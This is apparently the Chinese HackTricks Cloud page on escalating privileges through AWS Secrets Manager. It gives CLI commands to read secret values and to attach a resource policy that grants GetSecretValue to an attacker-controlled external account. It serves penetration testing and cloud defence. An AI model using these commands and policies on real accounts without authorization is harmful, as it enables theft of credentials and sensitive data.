Chinese - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

AWS - Secrets Manager Privesc

支持HackTricks

Secrets Manager

有关Secrets Manager的更多信息,请查看:

AWS - Secrets Manager Enum

secretsmanager:GetSecretValue

拥有此权限的攻击者可以获取AWS Secrets Manager中秘密中保存的值

aws secretsmanager get-secret-value --secret-id <secret_name> # Get value

潜在影响: 访问AWS Secrets Manager服务中的高度敏感数据。

secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)

具有上述权限后,可以将访问权限授予其他主体/帐户(甚至是外部帐户)以访问该secret。请注意,为了读取使用KMS密钥加密的secrets,用户还需要对KMS密钥具有访问权限(更多信息请参阅KMS Enum页面)。

aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name>
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": [
                "secretsmanager:GetResourcePolicy",
                "secretsmanager:GetSecretValue",
                "secretsmanager:DescribeSecret",
                "secretsmanager:ListSecretVersionIds"
            ],
            "Resource": "*"
        }
    ]
}
{
"Version" : "2012-10-17",
"Statement" : [ {
"Effect" : "Allow",
"Principal" : {
"AWS" : "arn:aws:iam::<attackers_account>:root"
},
"Action" : "secretsmanager:GetSecretValue",
"Resource" : "*"
} ]
}
支持 HackTricks
PreviousAWS - Sagemaker PrivescNextAWS - SSM Privesc

Last updated